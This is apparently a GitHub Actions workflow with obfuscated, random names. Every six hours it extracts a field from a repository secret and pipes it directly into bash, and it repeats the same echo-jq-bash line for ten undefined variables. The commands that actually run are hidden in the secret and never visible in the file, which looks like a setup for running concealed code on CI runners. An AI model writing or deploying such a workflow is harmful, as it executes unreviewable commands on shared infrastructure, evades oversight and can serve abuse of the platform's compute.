name: tremblenewspaper

on:
  workflow_dispatch:
  schedule:
    - cron: '1 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tremblenewspaper
        env:
          zsao3: ${{ secrets.zsao3 }}
        run: |
          echo $zsao3 | jq -r .es01 | /bin/bash
          echo $m789 | jq -r .k6 | /bin/bash
          echo $cfe11166 | jq -r .kcueg1 | /bin/bash
          echo $bej0633 | jq -r .zsbfq4772 | /bin/bash
          echo $dvk116 | jq -r .pg854 | /bin/bash
          echo $blpsv44043 | jq -r .dri25 | /bin/bash
          echo $pixf705 | jq -r .p40 | /bin/bash
          echo $pzgh14553 | jq -r .sn6948 | /bin/bash
          echo $wf0 | jq -r .yhlx9828 | /bin/bash
          echo $fo641 | jq -r .kotp9 | /bin/bash
          echo $muzc4091 | jq -r .w07 | /bin/bash

